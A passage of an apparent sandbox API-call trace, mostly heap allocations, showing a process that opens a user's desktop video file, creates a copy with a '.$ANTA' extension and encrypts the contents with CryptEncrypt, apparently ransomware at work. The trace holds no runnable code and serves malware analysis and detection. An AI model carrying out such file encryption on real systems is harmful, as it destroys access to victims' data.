dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0120.352] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0120.352] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0120.352] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0120.352] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea6b8 | out: hHeap=0x1780000) returned 1 [0120.352] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0120.352] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0120.352] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0120.352] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0120.352] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0120.352] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0120.352] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0120.352] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0120.352] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0120.352] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0120.352] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa18 | out: hHeap=0x1780000) returned 1 [0120.352] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0120.353] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd10 | out: hHeap=0x1780000) returned 1 [0120.353] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0120.353] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0120.353] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0120.353] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0120.353] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0120.353] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0120.353] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0120.353] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf888 | out: hHeap=0x1780000) returned 1 [0120.353] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0120.353] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0120.353] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b18 | out: hHeap=0x1780000) returned 1 [0120.353] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0120.353] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e28a8 | out: hHeap=0x1780000) returned 1 [0120.353] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fe8 | out: hHeap=0x1780000) returned 1 [0120.353] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0120.353] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0120.353] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0120.353] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc98 | out: hHeap=0x1780000) returned 1 [0120.353] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0120.353] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0120.353] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd38 | out: hHeap=0x1780000) returned 1 [0120.353] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0120.353] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb30 | out: hHeap=0x1780000) returned 1 [0120.353] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0120.353] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0120.353] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0120.353] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf900 | out: hHeap=0x1780000) returned 1 [0120.354] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0120.354] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0120.354] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0120.354] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb58 | out: hHeap=0x1780000) returned 1 [0120.354] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0120.354] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0120.354] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0120.354] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc48 | out: hHeap=0x1780000) returned 1 [0120.354] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0120.354] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0120.354] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0120.354] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0120.354] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0120.354] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d10 | out: hHeap=0x1780000) returned 1 [0120.354] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0120.354] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9578 | out: hHeap=0x1780000) returned 1 [0120.354] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0120.354] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0120.354] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac140 | out: hHeap=0x1780000) returned 1 [0120.354] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0120.354] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac600 | out: hHeap=0x1780000) returned 1 [0120.354] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0120.354] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0120.354] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0120.355] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\AQwif8E74Z.avi" (normalized: "c:\\users\\fd1hvy\\desktop\\aqwif8e74z.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0120.355] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0120.355] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144eeb0 | out: lpNewFilePointer=0x0) returned 1 [0120.355] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0120.355] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0120.355] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0120.355] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0120.355] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d10 | out: hHeap=0x1780000) returned 1 [0120.355] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0120.355] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0120.355] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0120.355] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0120.355] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0120.355] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0120.356] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0120.356] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e48 [0120.356] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0120.356] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e48 | out: hHeap=0x1780000) returned 1 [0120.356] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0120.356] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0120.356] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac600 [0120.356] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0120.356] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac600 | out: hHeap=0x1780000) returned 1 [0120.356] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0120.356] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0120.356] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0120.356] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0120.356] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0120.356] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0120.356] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0120.356] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0120.356] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0120.356] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0120.356] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0120.356] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0120.356] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0120.356] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0120.357] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0120.357] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0120.357] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0120.357] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0120.357] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0120.357] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0120.357] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0120.357] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0120.357] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0120.357] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0120.357] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0120.357] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0120.357] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0120.357] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392308 [0120.357] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0120.357] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x43595f0 [0120.357] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0120.357] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x43920d8 [0120.357] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0120.357] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x43924c8 [0120.357] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43595f0 | out: hHeap=0x1780000) returned 1 [0120.357] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0120.357] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0120.358] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0120.358] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392308 | out: hHeap=0x1780000) returned 1 [0120.358] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0120.358] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43920d8 | out: hHeap=0x1780000) returned 1 [0120.358] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0120.358] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90b0 [0120.358] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0120.358] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac600 [0120.358] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x4506008 [0120.358] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0120.358] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0120.358] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\AQwif8E74Z.avi.$ANTA" (normalized: "c:\\users\\fd1hvy\\desktop\\aqwif8e74z.avi.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0120.359] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0120.359] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0120.359] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0120.359] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0120.359] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0120.359] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0120.359] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e08 [0120.359] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac200 [0120.359] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0120.359] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac740 [0120.359] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0120.359] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0120.360] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0120.360] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0120.360] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0120.360] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0120.360] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0120.360] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0120.360] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0120.360] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0120.360] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0120.360] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0120.360] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x100000) returned 0x3e0e020 [0120.363] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144ef00 | out: lpNewFilePointer=0x0) returned 1 [0120.363] ReadFile (in: hFile=0x2a0, lpBuffer=0x43eb450, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43eb450*, lpNumberOfBytesRead=0x144ef28*=0x10000, lpOverlapped=0x0) returned 1 [0120.366] ReadFile (in: hFile=0x2a0, lpBuffer=0x43eb450, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43eb450*, lpNumberOfBytesRead=0x144ef28*=0x7a26, lpOverlapped=0x0) returned 1 [0120.367] ReadFile (in: hFile=0x2a0, lpBuffer=0x43eb450, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43eb450*, lpNumberOfBytesRead=0x144ef28*=0x0, lpOverlapped=0x0) returned 1 [0120.367] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0120.367] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x17a26) returned 0x4516010 [0120.371] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0120.371] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0120.371] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0120.371] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2728 [0120.371] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0120.371] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2920 [0120.371] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0120.371] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0120.371] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0120.371] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27c0 [0120.371] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0120.371] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2820 [0120.371] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0120.372] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0120.372] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0120.372] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2740 [0120.372] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27e0 [0120.372] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 [0120.372] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0120.372] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x11) returned 0x1796f08 [0120.372] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1796f08, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0120.372] CryptGetKeyParam (in: hKey=0x41ac640, dwParam=0x7, pbData=0x43e2770, pdwDataLen=0x144e260, dwFlags=0x0 | out: pbData=0x43e2770*=0x6610, pdwDataLen=0x144e260*=0x4) returned 1 [0120.372] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2900 [0120.372] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e9128 [0120.372] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e08 [0120.372] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac88 [0120.372] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab38 [0120.372] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 [0120.372] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2790 [0120.372] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0120.373] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0120.373] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0120.373] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0120.374] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0120.374] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caca0 [0120.374] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28a0 [0120.374] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2840 [0120.374] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab80 [0120.374] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0120.374] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xd) returned 0x43caaf0 [0120.374] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43caaf0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0120.374] CryptEncrypt (in: hKey=0x41ac640, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144e790*=0x17a26, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144e790*=0x17a30) returned 1 [0120.374] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0120.374] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e97a0 [0120.374] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff68 [0120.374] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab08 [0120.374] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0120.374] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad60 [0120.374] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0120.374] CharLowerBuffW (in: lpsz="byte[96817]", cchLength=0xb | out: lpsz="byte[96817]") returned 0xb [0120.374] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, 